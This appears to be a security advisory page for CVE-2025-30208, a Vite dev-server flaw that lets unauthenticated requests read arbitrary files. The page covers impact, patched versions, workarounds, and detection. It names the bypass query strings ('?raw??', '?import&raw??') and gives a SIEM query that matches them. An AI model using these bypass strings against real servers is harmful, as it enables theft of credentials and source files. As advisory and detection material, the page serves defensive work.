CVE-2025-30208
📋 TL;DR
This CVE describes a path traversal vulnerability in Vite development servers where attackers can bypass file access restrictions by appending '?raw??' or '?import&raw??' to URLs. This allows reading arbitrary files from the server. Only applications that explicitly expose their Vite dev server to the network using --host or server.host configuration are affected.
💻 Affected Systems
- Vite
📦 What is this software?
Vite by Vitejs
Vite by Vitejs
Vite by Vitejs
Vite by Vitejs
Vite by Vitejs
⚠️ Risk & Real-World Impact
Worst Case
Sensitive files like configuration files, environment variables, or source code could be exfiltrated, potentially exposing credentials, API keys, or intellectual property.
Likely Case
Attackers could read project files, configuration files, or other sensitive data stored in the Vite project directory or accessible file system paths.
If Mitigated
If Vite dev server is not exposed to the network (default configuration), there is no risk. Even when exposed, impact is limited to file read access only.
🎯 Exploit Status
Exploitation is straightforward - simply append ?raw?? or ?import&raw?? to URLs targeting files outside the allowed paths. No authentication required when dev server is network-exposed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 depending on your major version
Vendor Advisory: https://github.com/vitejs/vite/security/advisories
Restart Required: Yes
Instructions:
1. Check current Vite version: npm list vite. 2. Update to patched version: npm update vite@latest or specify exact version: npm install vite@6.2.3 (or appropriate version). 3. Restart Vite dev server.
🔧 Temporary Workarounds
Disable network exposure
allRemove --host flag or server.host configuration to prevent Vite dev server from being accessible over network
Remove '--host' from dev script in package.json
Remove or set 'server.host' to false in vite.config.js
🧯 If You Can't Patch
- Do not expose Vite dev server to network (remove --host flag and server.host configuration)
- Use network segmentation/firewall rules to restrict access to Vite dev server port (typically 5173 or 3000)
🔍 How to Verify
Check if Vulnerable:
Check if Vite dev server is running with --host flag or server.host config, and version is below patched versionsCheck Version:
npm list vite | grep viteVerify Fix Applied:
After update, verify version is 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 or higher📡 Detection & Monitoring
Log Indicators:
- Requests containing '?raw??' or '?import&raw??' query parameters
- Access to files outside normal project paths
Network Indicators:
- HTTP requests to Vite dev server port with unusual query parameters
- File read attempts via @fs paths with bypass parameters
SIEM Query:
http.url:*?raw?? OR http.url:*?import&raw?? AND destination.port:(5173 OR 3000)🔗 References
- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4
- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c
- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41
- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca
- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1
- https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
